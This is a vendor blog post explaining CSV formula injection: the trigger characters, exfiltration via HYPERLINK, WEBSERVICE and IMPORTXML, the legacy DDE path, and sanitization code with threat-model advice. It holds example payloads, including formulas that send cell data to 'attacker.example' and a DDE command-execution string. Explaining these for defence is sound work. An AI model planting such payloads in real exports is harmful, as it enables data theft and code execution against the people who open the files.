Why That Innocent CSV Export Can Pop a Calculator (CSV Injection, Explained)
Published on May 20, 2026 by The Kestrel Tools Team • 9 min read
A pen tester opens last week’s analytics export. The first thing on screen is a Calculator window. Nobody clicked anything, nobody ran a macro — they double-clicked a .csv file your service generated and Excel quietly executed a formula that lived inside one of the cells. Welcome to CSV formula injection: a vulnerability so understated that most exporters ship with it on day one and most security reviewers find it by accident.
The mechanism is brutally small. If a CSV cell starts with =, +, -, or @, Excel, Google Sheets, and LibreOffice Calc treat the cell as a formula instead of a string. That formula can call HYPERLINK, WEBSERVICE, IMPORTXML, or — in older Excel — invoke cmd.exe through DDE. Your CSV stopped being data the moment a spreadsheet opened it.
This post walks through what CSV injection actually does, why the four trigger characters matter, the three real fixes (and one popular fix that’s wrong more often than people realize), and the threat-model question that decides which fix you should ship.
What is CSV formula injection?
CSV formula injection (also called CSV injection or formula injection) is a vulnerability where a CSV file contains a cell beginning with a formula trigger character — =, +, -, or @ — and a spreadsheet application interprets that cell as an executable formula instead of a literal string. The risk surfaces when untrusted user input is written into a CSV that another user later opens in Excel, Google Sheets, or LibreOffice Calc.
The canonical bug report is straight out of an OWASP cheat sheet, but the reason it keeps happening is more interesting: nobody escaping CSVs treats them as code. They’re “just data.” The CSV format itself — RFC 4180 — says nothing about formulas. The vulnerability is created entirely by the spreadsheet’s interpretation of the file, which means the data and the threat model live in different layers and most teams only own one of them.
A minimum reproducible example is two lines:
name,note
Alice,=1+1
Open that in Excel or Sheets. The second cell renders as 2, not =1+1. You’ve just confirmed your spreadsheet evaluates strings that start with =. From here it’s a short walk to weaponized payloads.
The four trigger characters (and why they each matter)
Most write-ups mention =. The full set is four characters, and skipping any of them leaves a working bypass.
=— the obvious one.=1+1,=SUM(A1:A10),=HYPERLINK(...).+— Excel and Sheets accept+1+1as a formula. Same evaluation path as=.-—-1+1is also treated as a formula, because spreadsheets parse a leading minus as the start of a numeric expression that resolves through the formula engine.@— Excel uses@as the implicit-intersection operator (introduced with dynamic arrays in Office 365). A cell starting with@SUM(A1:A10)evaluates as a formula in current Excel.
There’s a fifth case worth knowing about even if it’s not strictly a leading character: tab and carriage-return prefixes. A cell starting with \t (a literal tab) is rendered as a tab in Excel and is not treated as a formula — which is exactly why one of the recommended sanitization patterns prepends a tab. The same is true of leading whitespace, but only on certain spreadsheet versions, so leading-space sanitization is unreliable.
If your sanitizer only checks for =, an attacker drops a + and you’re back to square one. The check has to be all four.
What can an attacker actually do?
The set of formula functions is wide, but four show up in real exploits.
1. Data exfiltration via HYPERLINK. A cell containing =HYPERLINK("https://attacker.example/?leak="&A1, "Click for report") looks like a normal link. When the victim clicks it, the link is constructed at click-time using whatever value lives in A1 — which might be a customer email, an order ID, or a session token if the export contains one. The exfiltration happens through a click the user thinks is benign.
2. Data exfiltration via WEBSERVICE / IMPORTXML. Excel’s WEBSERVICE(url) and Google Sheets’ IMPORTXML(url, xpath) make HTTP requests automatically when the cell is recalculated. No click required. A payload like =WEBSERVICE("https://attacker.example/?leak="&A1) sends the contents of A1 to the attacker on first open, and again every time the sheet recalculates. Modern Excel prompts before allowing external data connections, but the prompt is dismissible and many users click through.
3. Command execution via DDE (legacy Excel). The historical worst case is =cmd|'/c calc'!A1, which opens Calculator on Windows via Dynamic Data Exchange. Microsoft disabled DDE auto-execution by default in Office 2017 patches and the prompt today is a hard blocker, not a dismissible warning — but unpatched fleets, locked-down kiosks with weird configurations, and corporate Excel installations with old policies still trip on this. Threat-model accordingly.
4. Cross-site request forgery via IMPORTXML. If the victim is logged into an internal service and opens a malicious CSV in Sheets, an IMPORTXML call to an internal URL can issue a request with their session cookie. This is the spreadsheet-flavored version of classic CSRF, and it’s the reason internal admin exports are a higher-risk surface than they look.
Note what’s missing from this list: silent code execution on first open in modern Excel or Sheets. Both prompt before fetching external data or running DDE. The vulnerability isn’t “open a CSV, get owned” — it’s “open a CSV, get phished or exfiltrated through a believable-looking interaction.”
How to prevent CSV injection
There are three fixes that actually work, listed in the order I’d reach for them.
1. Prefix dangerous cells with a single quote (') — the OWASP recommendation
The OWASP CSV injection cheat sheet recommends prepending a single quote to any cell whose first character is =, +, -, or @. The quote tells Excel and Sheets to treat the cell as text.
function sanitizeCell(value) {
if (typeof value !== 'string') return value;
if (/^[=+\-@\t\r]/.test(value)) {
return "'" + value;
}
return value;
}
Pros: One-line fix. Works in Excel, Sheets, and LibreOffice. No CSV-format weirdness for downstream consumers.
Cons — and they’re real: The leading apostrophe is visible in some viewers and is part of the cell content in some non-spreadsheet CSV consumers. If a downstream pipeline parses your CSV with a generic CSV reader (Python’s csv, pandas.read_csv, etc.), it’ll see the apostrophe as data. This breaks reconciliation jobs, data archives, and any analytics flow that consumes the same CSV without re-processing it. It also looks weird to humans who skim the raw file.
Use this when the CSV’s exclusive consumer is a spreadsheet UI (Excel, Sheets, Numbers, LibreOffice).
2. Prefix dangerous cells with a tab (\t)
A leading tab character also forces text mode in Excel and Sheets, and unlike the apostrophe it survives the round trip more cleanly in most CSV parsers (the tab stays as data but doesn’t visually corrupt the value the same way).
function sanitizeCell(value) {
if (typeof value !== 'string') return value;
if (/^[=+\-@\t\r]/.test(value)) {
return '\t' + value;
}
return value;
}
Pros: Less visually disruptive than '. Spreadsheets render the tab as whitespace, not as a glyph.
Cons: Now your data has a leading tab everywhere a formula trigger would have been. Trim-on-read still strips it, which means a downstream consumer that strips whitespace before parsing puts the trigger character right back at the front. You’ve shifted the problem.
Use this when you need a less visible fix and you control — or trust — the downstream consumers.
3. Wrap the cell value in double quotes and escape it as text — spreadsheet-specific
For exports specifically targeted at Excel, you can serialize formula-leading cells with the spreadsheet’s text-format directive (e.g., ="..." paradoxically forces text mode in some Excel versions, but inconsistently across viewers and platforms). Don’t use this. It’s documented in older blog posts and almost always introduces new bugs.
Mention it only so you can recognize and remove it from legacy code.
The fix that doesn’t work: “just escape commas and quotes”
A surprising number of CSV libraries describe themselves as “injection-safe” because they correctly escape commas, quotes, and newlines per RFC 4180. They are not injection-safe. RFC 4180 escaping is about parsing — making sure a CSV reader correctly reconstructs the string Smith, John when it appears inside one cell. Formula injection is about interpretation by a spreadsheet, which happens after the parser already returned the right string.
If you read a CSV library’s docs and the word “formula” doesn’t appear, assume it doesn’t sanitize for injection. You’ll need to do that yourself, before serialization or as a post-process.
The threat-model question: should you sanitize at all?
Here’s the part most write-ups skip. Sanitization mutates your data. That might not be the right call.
Three common consumer profiles, three different right answers:
- The CSV is opened by humans in Excel/Sheets. Sanitize. The user-facing risk dwarfs the data-purity cost. Apply prefix-with-
'(option 1) and document it. - The CSV is a raw-data archive consumed only by automated pipelines. Don’t sanitize. Adding a leading
'to every formula-leading cell pollutes your dataset. Anyone running analytics over the archive has to know to strip it. Instead, document the file as machine-only and prevent it from being opened in a spreadsheet (e.g., serve it withContent-Disposition: attachment; filename="export.tsv"and use a non-spreadsheet extension). - The CSV is mixed-use — humans sometimes spot-check it, automation usually consumes it. This is where most teams live, and it’s where the fix has to be context-aware. Generate two files: a sanitized
export.csvfor spreadsheet consumption, and an unsanitizedexport.raw.csvfor the data pipeline. Or generate.xlsxdirectly with a proper writer that doesn’t have this problem (the.xlsxformat encodes formulas explicitly, so a string is unambiguously a string).
The right answer depends on who’s downstream. “Just sanitize on output” is incomplete advice because it assumes one consumer.
A hands-on demonstration in 60 seconds
Save this as payload.csv and open it in Google Sheets:
name,formula
Alice,=1+1
Bob,+2+2
Carol,-3+3
Dave,@SUM(1, 1)
Eve,=HYPERLINK("https://example.com/?id="&A1, "Click here")
Four cells render as numbers (2, 4, 0, 2). The fifth renders as a clickable link whose URL is built at click time using the value in A1 — which Sheets has helpfully concatenated for you. That’s the entire vulnerability. Five lines, every flavor on display.
Now paste the same payload into a client-side CSV/JSON converter and watch what the converter does with it. A privacy-respecting tool keeps the cells exactly as you typed them, because mutation isn’t its job — it’s a converter, not a sanitizer. That’s the right behavior for a general-purpose tool, and it’s a useful diagnostic: if you paste in a known-malicious CSV and the output is byte-identical, you have an authentic copy of the data and can decide yourself whether to sanitize it for the next step.
A quick word on BOMs and non-ASCII CSVs
A tangent worth knowing about because it shows up in the same code paths: if your CSV contains non-ASCII characters (Ă©, ä¸, emoji), Excel on Windows guesses the encoding from the byte order mark (BOM). No BOM, and Excel guesses Windows-1252, which mangles UTF-8. The fix is to write a UTF-8 BOM (\xEF\xBB\xBF) at the start of the file. This isn’t a security issue, but it’s adjacent to the sanitization step in your CSV writer and easy to forget. If your exports look fine in your browser and broken in Excel, the BOM is missing.
Common questions, answered concisely
Is CSV injection a CVE-class vulnerability? It’s tracked as CWE-1236 (Improper Neutralization of Formula Elements in a CSV File). Whether it gets a CVE depends on the application; many bug bounty programs accept it as a valid finding when an admin user can be tricked into opening a malicious export.
Does generating .xlsx directly avoid the problem? Yes, if the writer encodes formulas explicitly. Excel’s .xlsx format uses an XML schema that distinguishes a string cell (<c t="s">) from a formula cell (<c><f>...</f></c>), so a string can’t accidentally become a formula. Libraries like openpyxl (Python), exceljs (Node), and Apache POI (Java) get this right by default.
What about TSV (tab-separated values)? Same vulnerability. Excel and Sheets evaluate formula triggers regardless of the field separator. Sanitize the same way.
Does Google Sheets have a setting to disable formula evaluation on import? No. The evaluation happens at parse time. Your only mitigation is at the source.
Is =cmd|'/c calc'!A1 still exploitable? Only on Excel installations with DDE auto-execution enabled, which has been off-by-default since 2017 patches. Treat it as a residual risk for unpatched fleets and as a pen-test reproducer that still works in some environments.
The takeaway
CSV injection isn’t a CSV bug — it’s a spreadsheet bug that the CSV format hands the keys to. Any cell starting with =, +, -, or @ becomes a formula in Excel, Sheets, and LibreOffice. The exploits that matter today are data exfiltration through HYPERLINK, WEBSERVICE, and IMPORTXML; the legacy DDE command-execution path still works on unpatched Office.
Three workable fixes:
- Prepend
'to dangerous cells. OWASP’s recommendation. One line. Visible in some downstream consumers. - Prepend
\tto dangerous cells. Less visually disruptive. Trim-on-read can re-expose the trigger. - Generate
.xlsxdirectly. Avoids the problem entirely; formulas and strings live in different XML elements.
And one decision your sanitizer can’t make for you: who reads this file? If it’s a human in a spreadsheet, sanitize. If it’s an automated pipeline, document the file as machine-only and don’t mutate the data. If it’s both, ship two artifacts.
If you want a no-tracking, no-upload sandbox to inspect a suspicious export before it ships, paste it into Kestrel Tools — the converter runs entirely client-side, leaves your data unmodified, and lets you eyeball formula-leading cells before they reach a spreadsheet.